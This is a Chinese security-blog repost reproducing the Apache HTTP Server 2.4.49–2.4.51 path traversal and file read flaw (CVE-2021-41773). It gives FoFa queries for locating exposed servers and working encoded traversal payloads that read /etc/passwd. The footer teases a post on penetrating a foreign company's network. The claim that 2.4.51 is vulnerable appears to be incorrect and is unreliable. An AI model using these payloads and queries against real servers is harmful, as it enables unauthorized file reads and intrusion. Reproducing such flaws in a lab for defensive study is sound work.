【复现】Apache2.4.49-2.4.51任意文件读取

admin 2022年4月18日04:06:28安全文章评论62 views906字阅读3分1秒阅读模式

前言:2021年国庆期间。Apache官方发布安全通告,披露了Apache HTTP Server存在路径穿越漏洞。漏洞编号CVE-2021-41773。Apache HTTP Server 2.4.49版本包括最新版Apache HTTP Server 2.4.51 对路径规范化所做的更改中存在一个路径穿越漏洞。攻击者可利用该漏洞读取到Web目录外的其他文件。如:系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。

【复现】Apache2.4.49-2.4.51任意文件读取


0x01 漏洞详情

漏洞风险等级

漏洞风险点

攻击者可利用该漏洞获取敏感信息甚至远程代码执行


影响版本

Apache Http Server 2.4.49 <= 2.4.51


FoFa关键词

server="Apache/2.4.49"

server="Apache/2.4.50"

server="Apache/2.4.51"


漏洞利用前提条件:

1、Web容器 Apache版本为>= 2.4.49

2、服务器中设置所有目录允许被访问  例如 Apachep配置文件配置

<Directory />Require all granted</Directory>
配置文件

0x02 漏洞payload

Apache 2.4.49

/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

Apache 2.4.50

/cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/etc/passwd

Apache 2.4.51

/cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/etc/passwd
0x03 复现截图


【复现】Apache2.4.49-2.4.51任意文件读取

Apache2.4.49

【复现】Apache2.4.49-2.4.51任意文件读取

Apache2.4.50




【复现】Apache2.4.49-2.4.51任意文件读取

九九重阳,登高望远






【复现】Apache2.4.49-2.4.51任意文件读取

end

【复现】Apache2.4.49-2.4.51任意文件读取

下期预告

实战渗透境外某不友好国公司内网


投稿方式

欢迎投稿并加入我们,请联系公众号:Golden-Qianjiang



【复现】Apache2.4.49-2.4.51任意文件读取

 金色钱江,讲述杭州IT精英的成长之路!

 关注金色钱江,体验全能技术王者之路!


原文始发于微信公众号(金色钱江):【复现】Apache2.4.49-2.4.51任意文件读取

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月18日04:06:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【复现】Apache2.4.49-2.4.51任意文件读取 http://cn-sec.com/archives/581852.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: